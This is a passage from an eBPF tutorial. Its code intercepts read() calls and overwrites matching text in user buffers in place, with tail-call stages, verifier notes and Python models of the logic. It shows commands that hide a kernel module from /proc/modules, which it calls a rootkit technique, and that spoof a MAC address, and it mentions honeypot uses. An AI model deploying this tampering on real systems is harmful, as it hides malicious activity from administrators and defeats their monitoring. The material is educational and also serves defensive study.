        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name_len&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;text_len_max&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="c1"&gt;// Go over every possible location&lt;/span&gt;
    &lt;span class="c1"&gt;// and check if it really does match our text&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;MAX_POSSIBLE_ADDRS&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;newline_counter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;pName_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_name_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;newline_counter&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pName_addr&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="n"&gt;name_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;pName_addr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name_addr&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="n"&gt;bpf_probe_read_user&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;text_len_max&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;name_addr&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="c1"&gt;// for (j = 0; j &amp;lt; text_len_max; j++) {&lt;/span&gt;
        &lt;span class="c1"&gt;//     if (name[j] != text_find[j]) {&lt;/span&gt;
        &lt;span class="c1"&gt;//         break;&lt;/span&gt;
        &lt;span class="c1"&gt;//     }&lt;/span&gt;
        &lt;span class="c1"&gt;// }&lt;/span&gt;
        &lt;span class="c1"&gt;// We can use bpf_strncmp here,&lt;/span&gt;
        &lt;span class="c1"&gt;// but it is not available in kernel versions older than 5.17&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_strncmp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;text_len_max&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;text_find&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="c1"&gt;// ***********&lt;/span&gt;
            &lt;span class="c1"&gt;// We've found our text!&lt;/span&gt;
            &lt;span class="c1"&gt;// Add location to map to be overwritten&lt;/span&gt;
            &lt;span class="c1"&gt;// ***********&lt;/span&gt;
            &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_to_replace_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;match_counter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;name_addr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_ANY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;match_counter&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="n"&gt;bpf_map_delete_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_name_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;newline_counter&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// If we found at least one match, jump into program to overwrite text&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;match_counter&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;bpf_tail_call&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_prog_array&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PROG_02&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tp/syscalls/sys_exit_read"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;overwrite_addresses&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;trace_event_raw_sys_exit&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Check this read call is reading our target file&lt;/span&gt;
    &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;pbuff_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_buff_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pbuff_addr&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;pName_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;name_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;match_counter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="c1"&gt;// Loop over every address to replace text into&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;MAX_POSSIBLE_ADDRS&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;match_counter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;pName_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_to_replace_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;match_counter&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pName_addr&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="n"&gt;name_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;pName_addr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name_addr&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="c1"&gt;// Attempt to overwrite data with our replace string (minus the end null bytes)&lt;/span&gt;
        &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_probe_write_user&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;name_addr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;text_replace&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;text_len&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="c1"&gt;// Send event&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ringbuf_reserve&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="n"&gt;bpf_get_current_comm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
            &lt;span class="n"&gt;bpf_ringbuf_submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[TEXT_REPLACE] PID %d | [*] replaced: %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;text_find&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="c1"&gt;// Clean up map now we're done&lt;/span&gt;
        &lt;span class="n"&gt;bpf_map_delete_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_to_replace_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;match_counter&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The program starts with the familiar pattern of tracking file opens. When a process opens our target file (specified via the &lt;code&gt;filename&lt;/code&gt; constant), we record its file descriptor in &lt;code&gt;map_fds&lt;/code&gt;. This lets us identify reads from that specific file later.&lt;/p&gt;

&lt;p&gt;The interesting part begins in &lt;code&gt;handle_read_enter&lt;/code&gt;, where we capture the buffer address that userspace passed to the &lt;code&gt;read()&lt;/code&gt; system call. This address is where the kernel will write the file contents, and crucially, it's also where we can modify them before the userspace process looks at the data.&lt;/p&gt;

&lt;p&gt;The main logic lives in &lt;code&gt;find_possible_addrs&lt;/code&gt;, attached to &lt;code&gt;sys_exit_read&lt;/code&gt;. After the kernel completes the read operation, we scan through the buffer looking for potential matches. The constraint here is that we can't do unbounded loops—the verifier would reject that. So we read in chunks of &lt;code&gt;LOCAL_BUFF_SIZE&lt;/code&gt; bytes and scan for the first character of our search string. Each potential match address goes into &lt;code&gt;map_name_addrs&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Once we've scanned the buffer, we use a tail call to jump into &lt;code&gt;check_possible_addresses&lt;/code&gt;. This program iterates through the potential matches and performs full string comparison using &lt;code&gt;bpf_strncmp&lt;/code&gt; (available in kernel 5.17+). Confirmed matches move to &lt;code&gt;map_to_replace_addrs&lt;/code&gt;. If we found any matches, we tail-call once more into &lt;code&gt;overwrite_addresses&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The final stage, &lt;code&gt;overwrite_addresses&lt;/code&gt;, performs the actual modification using &lt;code&gt;bpf_probe_write_user&lt;/code&gt;. It loops through confirmed match locations and overwrites each one with the replacement text. The requirement that both strings have the same length prevents buffer corruption—we're doing in-place replacement without shifting any memory.&lt;/p&gt;
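&lt;p&gt;The three stages can be modeled in ordinary userspace Python to make the data flow concrete. This is only a sketch of the logic, not the eBPF code: the function names and the cap of 500 candidates are assumptions chosen for illustration, and a &lt;code&gt;bytearray&lt;/code&gt; stands in for the user buffer.&lt;/p&gt;

```python
MAX_POSSIBLE_ADDRS = 500  # assumed cap, standing in for the bounded loops the verifier requires


def find_possible_offsets(buf, find):
    """Stage 1: record every offset whose byte equals the first byte of `find`."""
    first = find[0]
    offsets = [i for i, b in enumerate(buf) if b == first]
    return offsets[:MAX_POSSIBLE_ADDRS]


def check_possible_offsets(buf, offsets, find):
    """Stage 2: keep only offsets where the full search string matches."""
    n = len(find)
    return [off for off in offsets if bytes(buf[off:off + n]) == find]


def overwrite_offsets(buf, offsets, replace):
    """Stage 3: overwrite each confirmed match in place."""
    for off in offsets:
        buf[off:off + len(replace)] = replace


def replace_in_buffer(buf, find, replace):
    """Run all three stages and return the number of replacements made."""
    if not find:
        raise ValueError("find must not be empty")
    # Equal lengths keep every other byte of the buffer where it was.
    if len(find) != len(replace):
        raise ValueError("find and replace must have the same length")
    candidates = find_possible_offsets(buf, find)
    confirmed = check_possible_offsets(buf, candidates, find)
    overwrite_offsets(buf, confirmed, replace)
    return len(confirmed)


if __name__ == "__main__":
    data = bytearray(b"joydev 32768 0 - Live\njoystick 1 0 - Live\n")
    count = replace_in_buffer(data, b"joydev", b"cryptd")
    print(count, data)
```

&lt;p&gt;Splitting the cheap first-byte scan from the full comparison mirrors the eBPF design: each stage stays small, and only the last one writes to the buffer.&lt;/p&gt;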

&lt;h2&gt;
  
  
  Tail Calls and Verifier Constraints
&lt;/h2&gt;

&lt;p&gt;The use of tail calls (&lt;code&gt;bpf_tail_call&lt;/code&gt;) is critical here. eBPF programs face strict complexity limits—the verifier analyzes every possible execution path to ensure the program terminates and doesn't access invalid memory. A single program that does scanning, matching, and replacement would exceed these limits.&lt;/p&gt;

&lt;p&gt;Tail calls provide a way to chain programs without piling all the complexity into one of them. The verifier checks each program in the chain separately, so each stage gets its own complexity budget. When &lt;code&gt;find_possible_addrs&lt;/code&gt; calls &lt;code&gt;bpf_tail_call(ctx, &amp;amp;map_prog_array, PROG_01)&lt;/code&gt;, it jumps to a different program (&lt;code&gt;check_possible_addresses&lt;/code&gt;) with the same context. The current program's execution ends there and control never returns to it. If the target slot in &lt;code&gt;map_prog_array&lt;/code&gt; is empty, the call fails and execution simply continues with the next instruction.&lt;/p&gt;

&lt;p&gt;The userspace loader must populate &lt;code&gt;map_prog_array&lt;/code&gt; with file descriptors for the tail-called programs before attaching anything. This is done in the userspace code using &lt;code&gt;bpf_map_update_elem&lt;/code&gt;, mapping index &lt;code&gt;PROG_01&lt;/code&gt; to the &lt;code&gt;check_possible_addresses&lt;/code&gt; program and &lt;code&gt;PROG_02&lt;/code&gt; to &lt;code&gt;overwrite_addresses&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;This architecture demonstrates a key eBPF development pattern: when you hit verifier limits, split your logic into multiple programs and use tail calls to coordinate them.&lt;/p&gt;
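&lt;p&gt;The control flow of a tail-call chain can be illustrated with a small Python model. This is a sketch under stated assumptions rather than how the kernel implements it: the index values for &lt;code&gt;PROG_01&lt;/code&gt; and &lt;code&gt;PROG_02&lt;/code&gt;, the helper names, and the chain limit of 33 (believed to match &lt;code&gt;MAX_TAIL_CALL_CNT&lt;/code&gt; in recent kernels) are all assumptions.&lt;/p&gt;

```python
MAX_TAIL_CALL_CNT = 33  # assumed chain limit, see the note above

PROG_01 = 1  # assumed index values for the program array
PROG_02 = 2


class TailCall(Exception):
    """Raised to abandon the current program and jump to another one."""

    def __init__(self, index):
        super().__init__(index)
        self.index = index


def tail_call(ctx, prog_array, index):
    # On an empty slot or an exhausted budget, do nothing and let the
    # caller continue with its next statement.
    if index not in prog_array or ctx["tail_calls"] == MAX_TAIL_CALL_CNT:
        return
    ctx["tail_calls"] += 1
    raise TailCall(index)


def run(prog_array, entry, ctx):
    """Run `entry`, following tail calls until a program returns normally."""
    ctx["tail_calls"] = 0
    prog = entry
    while True:
        try:
            return prog(ctx, prog_array)
        except TailCall as jump:
            prog = prog_array[jump.index]


def find_possible_addrs(ctx, prog_array):
    ctx["trace"].append("find")
    tail_call(ctx, prog_array, PROG_01)
    return 0  # reached only if the tail call did not happen


def check_possible_addresses(ctx, prog_array):
    ctx["trace"].append("check")
    tail_call(ctx, prog_array, PROG_02)
    return 0


def overwrite_addresses(ctx, prog_array):
    ctx["trace"].append("overwrite")
    return 0


if __name__ == "__main__":
    progs = {PROG_01: check_possible_addresses, PROG_02: overwrite_addresses}
    ctx = {"trace": []}
    run(progs, find_possible_addrs, ctx)
    print(ctx["trace"])
```

&lt;p&gt;Running the model with an empty program array shows why the loader must fill &lt;code&gt;map_prog_array&lt;/code&gt; first: the first stage runs, the jump silently does nothing, and the later stages never execute.&lt;/p&gt;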

&lt;h2&gt;
  
  
  Practical Examples and Security Implications
&lt;/h2&gt;

&lt;p&gt;Let's look at real-world use cases. Hiding kernel modules from detection:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./replace &lt;span class="nt"&gt;-f&lt;/span&gt; /proc/modules &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s1"&gt;'joydev'&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'cryptd'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When any process reads &lt;code&gt;/proc/modules&lt;/code&gt;, they'll see &lt;code&gt;cryptd&lt;/code&gt; where &lt;code&gt;joydev&lt;/code&gt; actually appears. The module is still loaded and functioning, but tools like &lt;code&gt;lsmod&lt;/code&gt; can't see it. This is a classic rootkit technique.&lt;/p&gt;

&lt;p&gt;Spoofing MAC addresses to defeat anti-sandbox checks:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./replace &lt;span class="nt"&gt;-f&lt;/span&gt; /sys/class/net/eth0/address &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s1"&gt;'00:15:5d:01:ca:05'&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'00:00:00:00:00:00'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Malware often checks for virtualization by looking at MAC address prefixes (the &lt;code&gt;00:15:5d&lt;/code&gt; prefix indicates Hyper-V). Replacing the real MAC address with zeros makes that check fail, so the malware behaves as it would on physical hardware and is easier to analyze in the sandbox.&lt;/p&gt;

&lt;p&gt;The defensive flip side is using this for honeypot systems. You can present fake credentials in configuration files, or make malware believe it successfully compromised a system when it hasn't. The file content on disk stays unchanged, but attackers reading it see false information.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Compile the program:&lt;br&gt;
&lt;/p&gt;

